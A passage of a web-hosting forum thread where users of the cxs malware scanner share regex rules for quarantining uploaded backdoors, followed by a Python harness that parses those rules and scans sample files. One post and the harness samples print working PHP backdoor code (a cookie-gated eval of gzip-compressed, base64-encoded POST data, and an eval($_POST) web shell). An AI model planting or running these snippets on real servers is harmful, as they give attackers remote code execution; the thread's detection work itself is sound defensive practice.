STICKY rules for CXS.XTRA regs.

Community forum to discuss cxs.
If you believe that there is a problem with your cxs installation and want support then, as a paid product, you should use the helpdesk after having consulted the documentation.
68 posts Page 6 of 7
mobileappsgallery
Junior Member
Posts: 1
Joined: 25 Jun 2012, 12:46


Doesn't work: regall:yahoo\.Com:68\.142\.202\.247
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


mobileappsgallery wrote:
Doesn't work: regall:yahoo\.Com:68\.142\.202\.247
I have tried and it is working:
Quarantine date:Mon Jun 25 08:37:51 2012
Quarantine file: /quarantine/ftp/owner/cxstest.php.1340631471_1
Quarantine file size: 67 bytes
Original file: /home/owner/public_html/cxstest.php
File owner: owner
FTP Account: owner
FTP IP address: xx.xx.xx.xx
md5sum: 4163ca7b518066623fe073cfd52650b4
Reason:
Regular expression match = [yahoo\.com\:68\.142\.202\.247]
Regular expression match = [yahoo\.Com:68\.142\.202\.247]
As you can see, I have tried with two rules and both worked.

Sergio
peterelsner
Junior Member
Posts: 73
Joined: 16 Nov 2010, 22:49


So, is no one updating this sticky list anymore?

It's been 6 months since the last update, and I know more strings exist that could be inserted here.
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


Hello Peterelsner,
If you can contribute, I am more than glad to add any string that you can provide.

I have not posted any more because, so far, my servers have not seen any attacks matching rules other than the ones I already have or the ones that CXS includes.

If you can help, it will be great.

Regards,

Sergio
peterelsner
Junior Member
Posts: 73
Joined: 16 Nov 2010, 22:49


Found a new one that you may want to add. Over the weekend I had no fewer than 150 messages that various gif/jpg/php files had been uploaded with suspicious data in them. They were marked as suspicious only and not quarantined.

Added this to my cxs.xtra file:

regall:quarantine:\$_POST\[\(chr\(112\)\.chr\(49\)\)

Then I ran a scan on the 4 or 5 users that had the most hits...

result was:

w1655179n.php.1369756806_1) Regular expression match = [\$_POST\[\(chr\(112\)\.chr\(49\)\)] (md5sum:254e27d2d8854a6bc9f9a760f4c52a15)

(dozens of others too). But now they got quarantined.
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


Thank you, Peter.

I am adding this to the sticky.

Regards,

Sergio
qchost
Junior Member
Posts: 1
Joined: 27 Jan 2014, 09:01


Another one that came up last night:
Code:
regall:quarantine:second stage dropper
regall:quarantine:killall -9
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


Thank you, qchost, I have added these to the sticky.

Regards,

Sergio
dieter
Junior Member
Posts: 11
Joined: 18 Mar 2011, 05:36


Hi all,

Could somebody please help me create a regex for this? I have found it on a couple of sites, where it is used to alter .js files.

if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit;

Regards,

Dieter
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


The sticky is only for regexes that CXS users donate to the forum, not for asking for one to be created. For this one time I am generating a regex for you, but please, if you need help, open a new thread asking for it.
Code:
regall:quarantine:\$msg\=@gzinflate\(@base64_decode\(@str_replace
On the other hand, please read thread viewtopic.php?f=26&t=7341#p21404, which is about .JS files.
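The rules donated in this thread (Peter's `$_POST[(chr(112).chr(49))` rule, qchost's `killall -9` and `second stage dropper` strings, and the regex Sergio built for Dieter's .js injector) share one working pattern: take a literal fragment of the malicious code, escape the regex metacharacters (`$`, `(`, `[`, `.`), and put it behind a `regall:quarantine:` prefix. The script below is an added example, not ConfigServer code and not part of any post above. It loads cxs.xtra-style lines, runs them over a few constructed sample files, and shows how to derive a correctly escaped rule from a literal snippet so the escaping is not done by hand. Assumptions: Python's `re` is used as an approximation of cxs's Perl regex engine (these particular patterns behave the same in both); a line whose text after `regall:` begins with `quarantine:` is treated as quarantining and any other line as report-only, with the remainder taken verbatim as the regex (which is why the first rule in this thread, which has no action field, keeps its second colon inside the pattern); the file contents are invented for the demonstration.

```python
import re

# Constructed cxs.xtra fragment: the rules donated in this thread, with the
# corrected "quarantine" spelling on the last one.
CXS_XTRA = r"""
# Donated rules from the sticky thread (constructed sample file)
regall:yahoo\.Com:68\.142\.202\.247
regall:quarantine:\$_POST\[\(chr\(112\)\.chr\(49\)\)
regall:quarantine:second stage dropper
regall:quarantine:killall -9
regall:quarantine:\$msg\=@gzinflate\(@base64_decode\(@str_replace
"""

# Constructed file contents to scan. Invented for this example; the paths
# only mimic the quarantine report layout seen earlier in the thread.
SAMPLE_FILES = {
    "public_html/w1655179n.php": "<?php @eval($_POST[(chr(112).chr(49))]); ?>",
    "public_html/js/jquery.min.js": (
        "if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)"
        "=='3469825000034634'){if (!empty($_POST['msg']) and "
        "$msg=@gzinflate(@base64_decode(@str_replace(' ','',"
        "urldecode($_POST['msg'])))){eval($msg);exit;}} exit;"
    ),
    "tmp/run.sh": "#!/bin/sh\nkillall -9 httpd\n",
    "public_html/index.php": "<?php echo 'hello'; ?>",
}


def load_rules(text):
    """Parse 'regall:[quarantine:]<regex>' lines into (action, pattern, compiled).

    Assumed convention: 'quarantine:' directly after 'regall:' selects the
    quarantine action; otherwise the whole remainder is the regex and the
    rule only reports. Blank lines, comments and non-regall lines are skipped.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or not line.startswith("regall:"):
            continue
        body = line[len("regall:"):]
        if body.startswith("quarantine:"):
            action, pattern = "quarantine", body[len("quarantine:"):]
        else:
            action, pattern = "report", body
        rules.append((action, pattern, re.compile(pattern)))
    return rules


def scan(rules, files):
    """Return {path: [(action, pattern), ...]} for every file that a rule hits."""
    hits = {}
    for path, content in files.items():
        for action, pattern, rx in rules:
            if rx.search(content):
                hits.setdefault(path, []).append((action, pattern))
    return hits


def rule_from_literal(snippet, action="quarantine"):
    """Build an escaped regall rule from a literal code fragment.

    re.escape() backslashes every regex metacharacter, so a fragment copied
    straight out of a quarantined file becomes a literal-match rule without
    hand-escaping '$', '(', '[' or '.'.
    """
    return "regall:%s:%s" % (action, re.escape(snippet))


if __name__ == "__main__":
    rules = load_rules(CXS_XTRA)
    for path, matches in sorted(scan(rules, SAMPLE_FILES).items()):
        for action, pattern in matches:
            print("%s: %s: Regular expression match = [%s]" % (path, action, pattern))
    # Derive Sergio's rule for Dieter's snippet automatically and confirm it fires.
    derived = rule_from_literal("$msg=@gzinflate(@base64_decode(@str_replace")
    print("derived rule:", derived)
    print("derived rule matches js sample:",
          bool(load_rules(derived)[0][2].search(SAMPLE_FILES["public_html/js/jquery.min.js"])))
```

Running the block prints one line per hit in the style of the quarantine report quoted earlier in the thread; the clean `index.php` produces nothing. Before dropping a derived rule into a live cxs.xtra, test it against the quarantined file with this kind of harness, and remember that a rule is only as specific as the fragment you chose: `killall -9` will also fire on a legitimate admin script, so the `quarantine` action deserves a more distinctive fragment where one is available.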